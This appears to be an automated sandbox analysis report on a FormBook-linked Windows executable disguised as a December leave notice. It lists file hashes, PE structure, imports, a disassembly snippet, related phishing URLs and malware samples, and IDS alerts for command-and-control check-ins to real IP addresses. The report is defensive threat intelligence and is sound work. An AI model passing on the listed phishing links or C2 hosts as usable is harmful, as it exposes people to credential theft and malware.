 | http://modelingcontest.000.pe/en?fbclid=PAZXh0bgNhZW0CMTEAAaa6oIoeflm16eQmOq1EZIkCPi7LQwqIUcx7ZtlQ7FlCxpWEYZM0cKUWzVI_aem_dLuQfyf714XDRjlRdJDY2Q | malicious | HTMLPhisher | 104.17.25.14
AMAZON-02US | la.bot.arm5.elf | malicious | Unknown | 34.243.160.129
 | https://bitly.cx/aMW9O9 | malicious | Unknown | 18.200.123.41
 | dvLKUpkeV8.elf | malicious | Unknown | 54.171.230.55
 | phish_alert_sp2_2.0.0.0.eml | malicious | HTMLPhisher | 13.248.176.92
 | https://url.uk.m.mimecastprotect.com/s/1u4eCqxlyukZk7ltZfxHE-ELz?domain=andy-25.simvoly.com | malicious | HTMLPhisher | 18.245.31.108
 | https://cardpayment.microransom.us/XYmdKR004c2prdTQ3eFRYdTZlUlAwSGhsclU2V3JnMWpuZ2h3Njg2emV0U3ZLY1Z4RkpNZm9HbkpHck9SNjFHb01Yem5jSDVSb2RmaXRIWUNvN2g1UHR4NlNzM05yeWg0R2VJSzhzSFlRVTN6UFZHYWpZSUxBeXpsYmtPMjFua1J5RFlLdm5OUVBGRnl2UWRxSjhpUFRwL1VXS1RqNEJjMmJwNkVPOVkvV2o3S3R0MkYzS1VXOG5uS1hHVll2eDdUb3hmcGtBb2VBTUdHc3hweEtXV25WRVZKdDBwWCtVZGtobzFsamp3PS0tYVREdUlIcWNwNFJ5RjAxci0tQWs2bGpCejYzaGsxMWJqSll4TWFNQT09?cid=293298779 | malicious | KnowBe4 | 52.214.139.140
 | +11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msg | malicious | HtmlDropper | 13.32.121.48
 | https://rebrand.ly/gs02u8a | malicious | Unknown | 76.76.21.98
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 13.32.99.21
MULTIBAND-NEWHOPEUS | http://mt6j71.p1keesoulharmony.com/ | malicious | HTMLPhisher, EvilProxy | 209.74.95.101
 | CV_ Filipa Barbosa.exe | malicious | FormBook | 209.74.77.108
 | RFQ 3100185 MAHAD.exe | malicious | FormBook | 209.74.77.107
 | A2028041200SD.exe | malicious | FormBook | 209.74.77.109
 | https://hmjpvx0wn1.gaimensebb.shop/ | malicious | EvilProxy, HTMLPhisher | 209.74.95.101
 | Order No 24.exe | malicious | FormBook | 209.74.64.58
 | dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | malicious | FormBook | 209.74.64.187
 | RFQ.exe | malicious | FormBook | 209.74.64.58
 | DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exe | malicious | FormBook | 209.74.64.59
 | https://u47618913.ct.sendgrid.net/ls/click?upn=u001.ySazWJ5NZMDRHbOtEU-2BeoVq5CHimfeKOmAStZ-2FBgQMYQ3SSwsETAhk1yN-2BT4-2Bp2oKYzZov6D-2F-2FVWJZ1NqqUA8rkCQTGD9qAyzE3VfFeoQ2nuSJqqyEFkZOdD2fHyfAGMqPTrK5an3w0r3jeoJ-2B5P7rAm7lpee2LRBP-2FVZ8vpCC6OhMnZUP9C90hQTb0-2BpgFS16pphNEcXB1XFdv8oIx-2FwRORRrbhR98R4uG9rtcNDDwGDlWsc4rC8kZPQKm-2F1Mm8tNwYXTNsqE7C9scBPWKFj8-2Flkc4ljwpAg27SdTSH4Lv1yIeDUc-2Br14vSnR5hortDhaaXBKI0vawIBQmkU8qdJOSHyv8egzfUQvo0FmhKgqV1moo-2BnRe99IbJ35dDYZE0MrccJKFnB5BMI9ztOOsnQMWDWj4usmLc-2BeVbqm24LsVBI18WzbkH2NLJelVG2ts-2FY8NEmgO2IHd2ydt-2BhAOvQWuc-2BoCn3Ao-2FeTWrPbny4XNYysHB9Qu5AO8kwT-2BngJOg10GMOXJS1JsoXicgqZmKM-2B-2FBOfXRHNWtl98FVLgmqGL1yDRbHi-2BrUHFtCwtB3BRDatptZmQIPNmSCXkxadq8IAoDDcDLc8BntBCtxPjmUSXgMaBFfsbPygwonXOkWZIQIxp1wvHXj-2BZ1eIGRPTwfugS5VMB7jYi-2FePeZ2P8ejmUXu0aUYor7jxsavDdhhTlU0d3WGd7xXyc70gSNl4s0N8kb-2FhMFZ3OuPfAMZG-2BGWl7Vsgw97GpKKLJX78rYX8Dtq0-2BFHI8oijeDXiQEnvU-2FI4F3F63PGiFfTUlwdYZGBzmjvsDN3AL1dSwty6HpxvSAKCtZ9VWrfa8NwcaFPKhxnxW4r2AR9TTWpNatEfU14LjPxEM-2F6jXkw8omQsSQ5ERlG1h6ZTouS0rz5yiYIeyCUVpUuOT4FtnK35YgC-2B0S-2FAum0FNVEv9aFTVDigH5szZA6pWOYsjwY5forGtNE55v7VxXGbkIRiEOYPWjYX7vj5EKbcmwdWMu8O3989atXdomEpBZG0cX1ylWoweLRVGVMNbSs-2FOqs-2B2xH8pdGj9VcybpSShtsD0ZIyshNyN0TwKGcJvKUNgMPDQVU64V5WleuedIajiM6uCp0xLc8RFYl0z-2B6RGF9NRTuzleNM-2Fg7hwq-2BEg52eVJjsFh3FdZjf0sr4TFySEDrqq3wci8zEr-2FI5c5Wj-2Fk-2F98bI-2FtCrFbLhfO78CKXQ3KYT53otrRT47GTmw-3D-3DwgKy_cipWnXOVDIhOM-2BBXOyzcHeOgQULBtPxx5riDWemF2G-2BwYzp7goEAXusjqSQprai9ZAQSor3gqS04DnqVBNX-2B27UevOScScKFnEaHJjzQ16GEAAakNELZybevGcJfbhSMyz-2FBkUhDktUr20hzj2tsCmKBBmBXnfL9SKUCvI82Axz3RMcAfJhD5XZvwDkb1SgvyUaaM4lOGnGhDtzRF5NN8-2FlqjhJjS-2FU6ncYoAfO4VYI-3D | malicious | HTMLPhisher | 209.74.72.93
                                                    No context
                                                    No context
Process: C:\Windows\SysWOW64\Utilman.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.121297215059106
Encrypted: false
SSDEEP: 384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5: D87270D0039ED3A5A72E7082EA71E305
SHA1: 0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256: F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512: 18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious: false
Reputation: high, very likely benign file
                                                    Process:C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):288256
                                                    Entropy (8bit):7.995592936197583
                                                    Encrypted:true
                                                    SSDEEP:6144:NnXe5jWCnyHoN4T6Bb2FC1r9ZyYp54q6slbP5w3DmIoYjv:NnXe5jp4mbIsy8UYz5wj5j
                                                    MD5:87A1A253AC5175F0DC2A665564E11B26
                                                    SHA1:F677A0E0F44311AA4BD5BF63CEB7524DD9D41282
                                                    SHA-256:D359BA9DE8DA10FD7F60D98C95B17CE567E53AA851C142039DC58AFE337C5E28
                                                    SHA-512:15F35FF8876BABB7A7CD49900AC66E3FD6C4CB17568511A34BC6983EF72F3B3BD9F23C6910A0931A30DC9452AE6C6A9582DF549532155AF4F90D6065913413F3
                                                    Malicious:false
                                                    Reputation:low
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.140075867030831
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:Mandatory Notice for all December Leave and Vacation application.exe
                                                    File size:1'207'808 bytes
                                                    MD5:201ad7754669b4d766349530adcca029
                                                    SHA1:52d55c5235158a805ff0059793c5f349ccd87684
                                                    SHA256:e16a801f068e55f9b014ac4b4cde9415fec763830ef433cb4eb3e0ee9734bf04
                                                    SHA512:deb8dc19760060424257ccc20ee0b253b819fb4c69e4faff187b840d07898998786ebdc297d9e39ddd231b736f8840cf3b5568fe13779e639485e96faa31f158
                                                    SSDEEP:24576:ktb20pkaCqT5TBWgNQ7a6U0ANyAaOhfPMzyN6E6A:NVg5tQ7a6U0ANy1Wf35
                                                    TLSH:F145D01373DD8361C3B25273BA66B741AEBF782506A1F96B2FD4093DF920122521E673
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                    Icon Hash:aaf3e3e3938382a0
                                                    Entrypoint:0x425f74
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x673F1531 [Thu Nov 21 11:10:41 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:1
                                                    File Version Major:5
                                                    File Version Minor:1
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:1
                                                    Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                    Instruction
                                                    call 00007FCB112B7A8Fh
                                                    jmp 00007FCB112AAAA4h
                                                    int3
                                                    int3
                                                    push edi
                                                    push esi
                                                    mov esi, dword ptr [esp+10h]
                                                    mov ecx, dword ptr [esp+14h]
                                                    mov edi, dword ptr [esp+0Ch]
                                                    mov eax, ecx
                                                    mov edx, ecx
                                                    add eax, esi
                                                    cmp edi, esi
                                                    jbe 00007FCB112AAC2Ah
                                                    cmp edi, eax
                                                    jc 00007FCB112AAF8Eh
                                                    bt dword ptr [004C0158h], 01h
                                                    jnc 00007FCB112AAC29h
                                                    rep movsb
                                                    jmp 00007FCB112AAF3Ch
                                                    cmp ecx, 00000080h
                                                    jc 00007FCB112AADF4h
                                                    mov eax, edi
                                                    xor eax, esi
                                                    test eax, 0000000Fh
                                                    jne 00007FCB112AAC30h
                                                    bt dword ptr [004BA370h], 01h
                                                    jc 00007FCB112AB100h
                                                    bt dword ptr [004C0158h], 00000000h
                                                    jnc 00007FCB112AADCDh
                                                    test edi, 00000003h
                                                    jne 00007FCB112AADDEh
                                                    test esi, 00000003h
                                                    jne 00007FCB112AADBDh
                                                    bt edi, 02h
                                                    jnc 00007FCB112AAC2Fh
                                                    mov eax, dword ptr [esi]
                                                    sub ecx, 04h
                                                    lea esi, dword ptr [esi+04h]
                                                    mov dword ptr [edi], eax
                                                    lea edi, dword ptr [edi+04h]
                                                    bt edi, 03h
                                                    jnc 00007FCB112AAC33h
                                                    movq xmm1, qword ptr [esi]
                                                    sub ecx, 08h
                                                    lea esi, dword ptr [esi+08h]
                                                    movq qword ptr [edi], xmm1
                                                    lea edi, dword ptr [edi+08h]
                                                    test esi, 00000007h
                                                    je 00007FCB112AAC85h
                                                    bt esi, 03h
                                                    jnc 00007FCB112AACD8h
                                                    movdqa xmm1, dqword ptr [esi+00h]
                                                    Programming Language:
                                                    • [ C ] VS2008 SP1 build 30729
                                                    • [IMP] VS2008 SP1 build 30729
                                                    • [ASM] VS2012 UPD4 build 61030
                                                    • [RES] VS2012 UPD4 build 61030
                                                    • [LNK] VS2012 UPD4 build 61030
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x5dcac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x122000 | 0x6c4c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296 | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | 827ffd24759e8e420890ecf164be989e | False | 0.330464397632312 | data | 5.770192333189168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xba000 | 0x9d54 | 0x6200 | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc4000 | 0x5dcac | 0x5de00 | 143e7bb5584cf7f76abfe4587e95887e | False | 0.929833139147803 | data | 7.8989860461691785 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x122000 | 0xa474 | 0xa600 | 0bc98f8631ef0bde830a7f83bb06ff08 | False | 0.5017884036144579 | data | 5.245426654116355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xc8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xca038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcc7b8 | 0x54fb1 | data | | | 1.0003332557651812
RT_GROUP_ICON | 0x12176c | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x1217e4 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x1217f8 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x12180c | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x121820 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x1218fc | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
DLL | Import
WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll | SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-21T16:17:42.074240+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49801 | 154.12.28.184 | 80 | TCP
2024-11-21T16:17:42.074240+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49801 | 154.12.28.184 | 80 | TCP
2024-11-21T16:17:48.785814+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49977 | 104.21.41.74 | 80 | TCP
2024-11-21T16:17:51.563396+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49978 | 104.21.41.74 | 80 | TCP
2024-11-21T16:17:54.274176+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49979 | 104.21.41.74 | 80 | TCP
2024-11-21T16:17:56.788087+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49980 | 104.21.41.74 | 80 | TCP
2024-11-21T16:17:56.788087+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49980 | 104.21.41.74 | 80 | TCP
2024-11-21T16:18:03.848431+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49981 | 172.67.167.146 | 80 | TCP
2024-11-21T16:18:06.502736+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49982 | 172.67.167.146 | 80 | TCP
2024-11-21T16:18:09.180543+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49983 | 172.67.167.146 | 80 | TCP
2024-11-21T16:18:11.891178+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49984 | 172.67.167.146 | 80 | TCP
2024-11-21T16:18:11.891178+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49984 | 172.67.167.146 | 80 | TCP
2024-11-21T16:18:19.133474+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49985 | 216.40.34.41 | 80 | TCP
